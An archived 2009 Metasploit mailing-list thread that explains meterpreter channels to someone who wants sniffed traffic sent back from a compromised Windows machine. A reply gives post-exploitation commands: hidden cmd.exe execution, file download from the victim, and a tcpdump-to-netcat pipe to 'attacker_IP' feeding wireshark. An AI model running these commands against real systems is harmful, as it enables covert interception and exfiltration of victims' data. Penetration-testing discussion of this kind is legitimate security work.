Metasploit mailing list archives
[framework-hackers] Channelized
From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Tue, 10 Feb 2009 00:30:49 +0000
2009/2/9 Bryan Richardson <btricha at gmail.com>
Thanks Anastasios, So, am I correct in assuming this is how one is dumped into a Windows shell after executing an exploit on a vulnerable Windows machine?
Bryan, if I am following you correctly, yes, using the download command supplied by meterpreter payload you can get a file from victim's machine to your machine. Note that in the case of windows you will have to escape the \ with an extra \ when(if) specifying the full path of the file's source and destination, obviously if you do "download file.txt file.txt" it will try to get the file from victim's current directory and save it to your current directory.
I was hoping that I could 'channelize' a traffic sniffer such that the sniffed traffic would be sent back to me in real time for real time analysis... it doesn't seem like this is the case.
I agree, real-time traffic in some environments really helps the whole task Ultimately, what would be cool is to have my real-time traffic analysis
software listening on a particular port and have some way of sending the sniffed traffic from the compromised machine to that particular port on my local machine.
I think it worths trying piping your live data through nc as we do with dd, but I am not sure if it will work in your case, oh you will have to let your nc traffic pass the firewall. For example: On victim you can try something like: tcpdump -e host victim_ip and port 23 | nc attacker_IP attacker_listening_port On attacker: nc -l -p attacker_listening_port | wireshark -i - Taken from wireshark's man " .... Pipe names should be either the name of a FIFO (named pipe) or ''-'' to read data from the standard input. Data read from pipes must be in standard libpcap format...." Last you may also play with the channel read/write options, so to pass nc's traffic through the channel (?), maybe someone else can reach more light here Let us know what worked and what didnt anyway Tasos
-- Bryan On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos <anastasiosm at gmail.comwrote:2009/2/9 Bryan Richardson <btricha at gmail.com>Hello All, Would someone mind explaining to me what 'channelized' is and how it works?You can use "channelisation" in cases where you wish to work with multiple communication channels that will be tunnelled through one tcp/ip session. Channels are supported by the meterpreter payload, and to channelise you can do: meterpreter > execute -f cmd.exe -H -c //this will execute the file cmd.exe, it will hide the process window and it will channelise the task Process 1234 created. //this is output from meterpreter Channel 2 created.//this is output from meterpreter meterpreter > //now use meterpreter as usual to do your other stuff meterpreter > interact 2 //now interact with channelised cmd.exeI'm wanting to try and use it to send sniffed traffic back to me from a compromised machine that I upload a traffic sniffer to...For already saved captured data you could use the upload/download commands (again from within meterpreter)-- Thanks! Bryan _______________________________________________ Framework-Hackers mailing list Framework-Hackers at spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers-- AM
-- AM -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090210/15380c3e/attachment.htm>
Current thread:
- [framework-hackers] Channelized Anastasios Monachos (Feb 09)
- Message not available
- Message not available
- [framework-hackers] Fwd: Channelized Anastasios Monachos (Feb 12)
- Message not available
- Message not available